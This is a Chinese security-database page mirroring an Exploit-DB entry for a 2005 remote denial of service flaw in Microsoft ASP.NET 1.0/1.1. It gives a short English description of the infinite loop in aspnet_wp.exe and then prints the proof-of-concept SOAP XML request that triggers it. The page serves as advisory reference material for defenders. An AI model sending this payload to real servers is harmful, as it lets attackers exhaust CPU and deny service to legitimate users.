Microsoft ASP.NET 1.0/1.1 – RPC/Encoded Remote Denial of Service

Microsoft ASP.NET 1.0/1.1 – RPC/Encoded Remote Denial of Service

漏洞ID 1055248 漏洞类型
发布时间 2005-07-12 更新时间 2005-07-12
图片[1]-Microsoft ASP.NET 1.0/1.1 – RPC/Encoded Remote Denial of Service-安全小百科CVE编号 N/A
图片[2]-Microsoft ASP.NET 1.0/1.1 – RPC/Encoded Remote Denial of Service-安全小百科CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25962
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14217/info

ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests.

This issue presents itself when an RPC/encoded Web method accepts an array or object derived from 'IList'. By sending a specially crafted XML request, the 'aspnet_wp.exe' executable enters into an infinite loop.

Remote attackers may exploit this vulnerability to consume excessive CPU resources, potentially denying service to legitimate users. 


<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:tns="http://tempuri.org/"
xmlns:types="http://tempuri.org/encodedTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<tns:Test>
<someList href="#id1" />
</tns:Test>
<tns:ArrayOfInt>
<Item>0</Item>
</tns:ArrayOfint>
</soap:Body>
</soap:Envelope>

相关推荐: IRIX and AIX automountd services (autofsd)命令执行漏洞。

IRIX and AIX automountd services (autofsd)命令执行漏洞。 漏洞ID 1207273 漏洞类型 未知 发布时间 1998-10-26 更新时间 1998-10-26 CVE编号 CVE-1999-0088 CNNVD-I…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享